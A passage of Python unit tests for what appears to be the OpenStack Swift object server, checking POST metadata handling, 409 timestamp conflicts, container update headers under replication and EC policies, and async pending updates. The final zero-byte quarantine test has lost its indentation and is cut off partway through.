        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), expected_headers)
        # sysmeta sent with POST is ignored: Color stays 'blue'
        post_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': post_timestamp,
                                     'X-Object-Sysmeta-Color': 'red',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'blue',
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'blue',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        })
        # test defaults
        self.object_controller.allowed_headers = original_headers
        put_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': put_timestamp,
                                     'Content-Type': 'application/x-test',
                                     'Foo': 'fooheader',
                                     'X-Object-Sysmeta-Color': 'red',
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Manifest': 'c/bar',
                                     'Content-Encoding': 'gzip',
                                     'Content-Disposition': 'bar',
                                     'X-Static-Large-Object': 'True',
                                     })
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'Etag': etag,
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'red',
            'X-Object-Meta-1': 'One',
            'Content-Encoding': 'gzip',
            'X-Object-Manifest': 'c/bar',
            'Content-Disposition': 'bar',
            'X-Static-Large-Object': 'True',
            'X-Backend-Timestamp': put_timestamp,
            'X-Timestamp': put_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(put_timestamp)))),
        })
        # POST wipes previous user meta; X-Static-Large-Object persists
        post_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': post_timestamp,
                                     'X-Object-Meta-3': 'Three',
                                     'Foo': 'fooheader',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'red',
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'red',
            'X-Object-Meta-3': 'Three',
            'X-Static-Large-Object': 'True',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        })
        # Test for empty metadata
        post_timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': post_timestamp,
                                     'Content-Type': 'application/x-test',
                                     'X-Object-Meta-3': ''})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'red',
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'red',
            'X-Object-Meta-3': '',
            'X-Static-Large-Object': 'True',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        })
    def test_POST_old_timestamp(self):
        # a POST whose timestamp is not newer than the stored object's must
        # be rejected with 409 and report the stored timestamp
        ts = time()
        orig_timestamp = utils.Timestamp(ts).internal
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': orig_timestamp,
                                     'Content-Type': 'application/x-test',
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        # Same timestamp should result in 409
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': orig_timestamp,
                                     'X-Object-Meta-3': 'Three',
                                     'X-Object-Meta-4': 'Four',
                                     'Content-Encoding': 'gzip',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)

        # Earlier timestamp should result in 409
        timestamp = normalize_timestamp(ts - 1)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': timestamp,
                                     'X-Object-Meta-5': 'Five',
                                     'X-Object-Meta-6': 'Six',
                                     'Content-Encoding': 'gzip',
                                     'Content-Type': 'application/x-test'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
    def test_POST_conflicts_with_later_POST(self):
        # a POST older than an already-applied POST gets 409 and must not
        # leave a .meta file on disk
        t_put = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': t_put,
                                     'Content-Length': 0,
                                     'Content-Type': 'plain/text'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        t_post1 = next(self.ts).internal
        t_post2 = next(self.ts).internal
        # apply the newer POST first...
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': t_post2})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)

        # ...then the older POST must conflict
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': t_post1})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)

        # only the newer POST's .meta file should exist on disk
        obj_dir = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')))

        ts_file = os.path.join(obj_dir, t_post2 + '.meta')
        self.assertTrue(os.path.isfile(ts_file))
        meta_file = os.path.join(obj_dir, t_post1 + '.meta')
        self.assertFalse(os.path.isfile(meta_file))
    def test_POST_not_exist(self):
        # POST to an object that was never PUT returns 404
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/fail',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': timestamp,
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-2': 'Two',
                                     'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
    def test_POST_invalid_path(self):
        # POST to a container path (no object component) returns 400
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': timestamp,
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-2': 'Two',
                                     'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
    def test_POST_no_timestamp(self):
        # POST without an X-Timestamp header returns 400
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-2': 'Two',
                                     'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
    def test_POST_bad_timestamp(self):
        # POST with an unparsable X-Timestamp returns 400
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': 'bad',
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-2': 'Two',
                                     'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
    def test_POST_container_connection(self):
        # Test that POST does call container_update and returns success
        # whether update to container server succeeds or fails

        def mock_http_connect(calls, response, with_exc=False):
            # returns a factory producing FakeConn objects that count
            # getresponse() calls and optionally raise

            class FakeConn(object):

                def __init__(self, calls, status, with_exc):
                    self.calls = calls
                    self.status = status
                    self.reason = 'Fake'
                    self.host = '1.2.3.4'
                    self.port = '1234'
                    self.with_exc = with_exc

                def getresponse(self):
                    calls[0] += 1
                    if self.with_exc:
                        raise Exception('test')
                    return self

                def read(self, amt=None):
                    return ''

            return lambda *args, **kwargs: FakeConn(calls, response, with_exc)

        ts = time()
        timestamp = normalize_timestamp(ts)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Content-Length': '0'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # container server answers 202: POST succeeds
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(ts + 1),
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new1'})
        calls = [0]
        with mock.patch.object(object_server, 'http_connect',
                               mock_http_connect(calls, 202)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # container connection raises: POST still succeeds
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(ts + 2),
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new1'})
        calls = [0]
        with mock.patch.object(object_server, 'http_connect',
                               mock_http_connect(calls, 202, with_exc=True)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # container server answers 500: POST still succeeds
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(ts + 3),
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new2'})
        calls = [0]
        with mock.patch.object(object_server, 'http_connect',
                               mock_http_connect(calls, 500)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
    def _test_POST_container_updates(self, policy, update_etag=None):
        """Drive a PUT then a series of POSTs under one storage policy and
        verify exactly which container_update calls are made and with which
        x-* headers.

        :param policy: the storage policy to exercise
        :param update_etag: etag expected in container updates; defaults to
                            the md5 of the literal body 'test'
        """
        # Test that POST requests result in correct calls to container_update
        t = [next(self.ts) for _ in range(0, 5)]
        calls_made = []
        update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'
        def mock_container_update(ctlr, op, account, container, obj, request,
                                  headers_out, objdevice, policy):
            # capture what would have been sent to the container server
            calls_made.append((headers_out, policy))
        body = 'test'
        headers = {
            'X-Timestamp': t[1].internal,
            'Content-Type': 'application/octet-stream;swift_bytes=123456789',
            'X-Backend-Storage-Policy-Index': int(policy)}
        if policy.policy_type == EC_POLICY:
            # EC fragments will typically have a different size to the body and
            # for small bodies the fragments may be longer. For this test all
            # that matters is that the fragment and body lengths differ.
            body = body + 'ec_overhead'
            headers['X-Backend-Container-Update-Override-Etag'] = update_etag
            headers['X-Backend-Container-Update-Override-Size'] = '4'
            headers['X-Object-Sysmeta-Ec-Etag'] = update_etag
            headers['X-Object-Sysmeta-Ec-Content-Length'] = '4'
            headers['X-Object-Sysmeta-Ec-Frag-Index'] = 2
        headers['Content-Length'] = str(len(body))
        req = Request.blank('/sda1/p/a/c/o', body=body,
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'application/octet-stream;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with no metadata newer than the data should return 409,
        # container update not expected
        calls_made = []
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': t[0].internal,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['x-backend-timestamp'],
                         t[1].internal)
        self.assertEqual(0, len(calls_made))
        # POST with newer metadata returns success and container update
        # is expected
        calls_made = []
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': t[3].internal,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'application/octet-stream;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[1].internal,
            'x-meta-timestamp': t[3].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with no metadata newer than existing metadata should return
        # 409, container update not expected
        calls_made = []
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': t[2].internal,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['x-backend-timestamp'],
                         t[3].internal)
        self.assertEqual(0, len(calls_made))
        # POST with newer content-type but older metadata returns success
        # and container update is expected newer content-type should have
        # existing swift_bytes appended
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[2].internal,
                                'Content-Type': 'text/plain',
                                'Content-Type-Timestamp': t[2].internal,
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'text/plain;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[2].internal,
            'x-meta-timestamp': t[3].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with older content-type but newer metadata returns success
        # and container update is expected
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[4].internal,
                                'Content-Type': 'older',
                                'Content-Type-Timestamp': t[1].internal,
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'text/plain;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[2].internal,
            'x-meta-timestamp': t[4].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
        # POST with same-time content-type and metadata returns 409
        # and no container update is expected
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[4].internal,
                                'Content-Type': 'ignored',
                                'Content-Type-Timestamp': t[2].internal,
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(0, len(calls_made))
        # POST with implicit newer content-type but older metadata
        # returns success and container update is expected,
        # update reports existing metadata timestamp
        calls_made = []
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={
                                'X-Timestamp': t[3].internal,
                                'Content-Type': 'text/newer',
                                'X-Backend-Storage-Policy-Index': int(policy)
                            })
        with mock.patch('swift.obj.server.ObjectController.container_update',
                        mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(1, len(calls_made))
        expected_headers = HeaderKeyDict({
            'x-size': '4',
            'x-content-type': 'text/newer;swift_bytes=123456789',
            'x-timestamp': t[1].internal,
            'x-content-type-timestamp': t[3].internal,
            'x-meta-timestamp': t[4].internal,
            'x-etag': update_etag})
        self.assertDictEqual(expected_headers, calls_made[0][0])
        self.assertEqual(policy, calls_made[0][1])
    def test_POST_container_updates_with_replication_policy(self):
        # exercise the shared POST container-update scenarios under the
        # replication storage policy (POLICIES[0])
        self._test_POST_container_updates(POLICIES[0])
    def test_POST_container_updates_with_EC_policy(self):
        # same scenarios under the EC policy; container updates are expected
        # to carry the override etag rather than the plain body etag
        self._test_POST_container_updates(
            POLICIES[1], update_etag='override_etag')
    def test_POST_container_updates_precedence(self):
        """Check which etag/size override headers take precedence in the
        container updates triggered by a PUT and a subsequent POST."""
        # Verify correct etag and size being sent with container updates for a
        # PUT and for a subsequent POST.
        def do_test(body, headers, policy):
            def mock_container_update(ctlr, op, account, container, obj, req,
                                      headers_out, objdevice, policy):
                # capture what would have been sent to the container server
                calls_made.append((headers_out, policy))
            calls_made = []
            ts_put = next(self.ts)
            # make PUT with given headers and verify correct etag is sent in
            # container update
            headers.update({
                'Content-Type':
                    'application/octet-stream;swift_bytes=123456789',
                'X-Backend-Storage-Policy-Index': int(policy),
                'X-Object-Sysmeta-Ec-Frag-Index': 2,
                'X-Timestamp': ts_put.internal,
                'Content-Length': len(body)})
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'PUT'},
                                headers=headers, body=body)
            with mock.patch(
                    'swift.obj.server.ObjectController.container_update',
                    mock_container_update):
                resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            self.assertEqual(1, len(calls_made))
            expected_headers = HeaderKeyDict({
                'x-size': '4',
                'x-content-type':
                    'application/octet-stream;swift_bytes=123456789',
                'x-timestamp': ts_put.internal,
                'x-etag': 'expected'})
            self.assertDictEqual(expected_headers, calls_made[0][0])
            self.assertEqual(policy, calls_made[0][1])
            # make a POST and verify container update has the same etag
            calls_made = []
            ts_post = next(self.ts)
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
                headers={'X-Timestamp': ts_post.internal,
                         'X-Backend-Storage-Policy-Index': int(policy)})
            with mock.patch(
                    'swift.obj.server.ObjectController.container_update',
                    mock_container_update):
                resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 202)
            self.assertEqual(1, len(calls_made))
            expected_headers.update({
                'x-content-type-timestamp': ts_put.internal,
                'x-meta-timestamp': ts_post.internal})
            self.assertDictEqual(expected_headers, calls_made[0][0])
            self.assertEqual(policy, calls_made[0][1])
        # sanity check - EC headers are ok
        headers = {
            'X-Backend-Container-Update-Override-Etag': 'expected',
            'X-Backend-Container-Update-Override-Size': '4',
            'X-Object-Sysmeta-Ec-Etag': 'expected',
            'X-Object-Sysmeta-Ec-Content-Length': '4'}
        do_test('test ec frag longer than 4', headers, POLICIES[1])
        # middleware overrides take precedence over EC/older overrides
        headers = {
            'X-Backend-Container-Update-Override-Etag': 'unexpected',
            'X-Backend-Container-Update-Override-Size': '3',
            'X-Object-Sysmeta-Ec-Etag': 'unexpected',
            'X-Object-Sysmeta-Ec-Content-Length': '3',
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
            'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
        do_test('test ec frag longer than 4', headers, POLICIES[1])
        # overrides with replication policy
        headers = {
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
            'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
        do_test('longer than 4', headers, POLICIES[0])
        # middleware overrides take precedence over EC/older overrides with
        # replication policy
        headers = {
            'X-Backend-Container-Update-Override-Etag': 'unexpected',
            'X-Backend-Container-Update-Override-Size': '3',
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
            'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
        do_test('longer than 4', headers, POLICIES[0])
    def _test_PUT_then_POST_async_pendings(self, policy, update_etag=None):
        """PUT then POST while synchronous container updates fail: each
        request must leave its own distinct async pending file, and the
        object updater must then send only the most recent (POST) update
        and remove both pending files.

        :param policy: storage policy to exercise
        :param update_etag: etag expected in the async updates; defaults to
                            the md5 of the literal body 'test'
        """
        # Test that PUT and POST requests result in distinct async pending
        # files when sync container update fails.
        def fake_http_connect(*args):
            # force the synchronous container update to fail
            raise Exception('test')
        device_dir = os.path.join(self.testdir, 'sda1')
        t_put = next(self.ts)
        update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'
        put_headers = {
            'X-Trans-Id': 'put_trans_id',
            'X-Timestamp': t_put.internal,
            'Content-Type': 'application/octet-stream;swift_bytes=123456789',
            'Content-Length': '4',
            'X-Backend-Storage-Policy-Index': int(policy),
            'X-Container-Host': 'chost:cport',
            'X-Container-Partition': 'cpartition',
            'X-Container-Device': 'cdevice'}
        if policy.policy_type == EC_POLICY:
            put_headers.update({
                'X-Object-Sysmeta-Ec-Frag-Index': '2',
                'X-Backend-Container-Update-Override-Etag': update_etag,
                'X-Object-Sysmeta-Ec-Etag': update_etag})
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=put_headers, body='test')
        with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
                mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
                fake_spawn():
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # the failed update must have been spooled to an async pending file
        # named for the object hash and the PUT timestamp
        async_pending_file_put = os.path.join(
            device_dir, diskfile.get_async_dir(policy), 'a83',
            '06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_put.internal)
        self.assertTrue(os.path.isfile(async_pending_file_put),
                        'Expected %s to be a file but it is not.'
                        % async_pending_file_put)
        expected_put_headers = {
            'Referer': 'PUT http://localhost/sda1/p/a/c/o',
            'X-Trans-Id': 'put_trans_id',
            'X-Timestamp': t_put.internal,
            'X-Content-Type': 'application/octet-stream;swift_bytes=123456789',
            'X-Size': '4',
            'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
            'User-Agent': 'object-server %s' % os.getpid(),
            'X-Backend-Storage-Policy-Index': '%d' % int(policy)}
        if policy.policy_type == EC_POLICY:
            expected_put_headers['X-Etag'] = update_etag
        self.assertDictEqual(
            pickle.load(open(async_pending_file_put)),
            {'headers': expected_put_headers,
             'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
        # POST with newer metadata returns success and container update
        # is expected
        t_post = next(self.ts)
        post_headers = {
            'X-Trans-Id': 'post_trans_id',
            'X-Timestamp': t_post.internal,
            'Content-Type': 'application/other',
            'X-Backend-Storage-Policy-Index': int(policy),
            'X-Container-Host': 'chost:cport',
            'X-Container-Partition': 'cpartition',
            'X-Container-Device': 'cdevice'}
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers=post_headers)
        with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
                mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
                fake_spawn():
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.maxDiff = None
        # check async pending file for PUT is still intact
        self.assertDictEqual(
            pickle.load(open(async_pending_file_put)),
            {'headers': expected_put_headers,
             'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
        # check distinct async pending file for POST
        async_pending_file_post = os.path.join(
            device_dir, diskfile.get_async_dir(policy), 'a83',
            '06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_post.internal)
        self.assertTrue(os.path.isfile(async_pending_file_post),
                        'Expected %s to be a file but it is not.'
                        % async_pending_file_post)
        expected_post_headers = {
            'Referer': 'POST http://localhost/sda1/p/a/c/o',
            'X-Trans-Id': 'post_trans_id',
            'X-Timestamp': t_put.internal,
            'X-Content-Type': 'application/other;swift_bytes=123456789',
            'X-Size': '4',
            'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
            'User-Agent': 'object-server %s' % os.getpid(),
            'X-Backend-Storage-Policy-Index': '%d' % int(policy),
            'X-Meta-Timestamp': t_post.internal,
            'X-Content-Type-Timestamp': t_post.internal,
        }
        if policy.policy_type == EC_POLICY:
            expected_post_headers['X-Etag'] = update_etag
        self.assertDictEqual(
            pickle.load(open(async_pending_file_post)),
            {'headers': expected_post_headers,
             'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
        # verify that only the POST (most recent) async update gets sent by the
        # object updater, and that both update files are deleted
        with mock.patch(
            'swift.obj.updater.ObjectUpdater.object_update') as mock_update, \
                mock.patch('swift.obj.updater.dump_recon_cache'):
            object_updater = updater.ObjectUpdater(
                {'devices': self.testdir,
                 'mount_check': 'false'}, logger=debug_logger())
            node = {'id': 1}
            mock_ring = mock.MagicMock()
            mock_ring.get_nodes.return_value = (99, [node])
            object_updater.container_ring = mock_ring
            mock_update.return_value = ((True, 1))
            object_updater.run_once()
        self.assertEqual(1, mock_update.call_count)
        self.assertEqual((node, 99, 'PUT', '/a/c/o'),
                         mock_update.call_args_list[0][0][0:4])
        actual_headers = mock_update.call_args_list[0][0][4]
        # User-Agent is updated.
        expected_post_headers['User-Agent'] = 'object-updater %s' % os.getpid()
        self.assertDictEqual(expected_post_headers, actual_headers)
        self.assertFalse(
            os.listdir(os.path.join(
                device_dir, diskfile.get_async_dir(policy))))
    def test_PUT_then_POST_async_pendings_with_repl_policy(self):
        # run the shared async-pendings scenario under the replication policy
        self._test_PUT_then_POST_async_pendings(POLICIES[0])
    def test_PUT_then_POST_async_pendings_with_EC_policy(self):
        # run the shared async-pendings scenario under the EC policy, whose
        # updates carry the override etag instead of the body md5
        self._test_PUT_then_POST_async_pendings(
            POLICIES[1], update_etag='override_etag')
def test_POST_quarantine_zbyte(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
objfile.open()
file_name = os.path.basename(objfile._data_file)
with open(objfile._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(objfile._data_file)
with open(objfile._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
self.assertEqual(os.listdir(objfile._datadir)[0], file_name)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(objfile._data_file)))
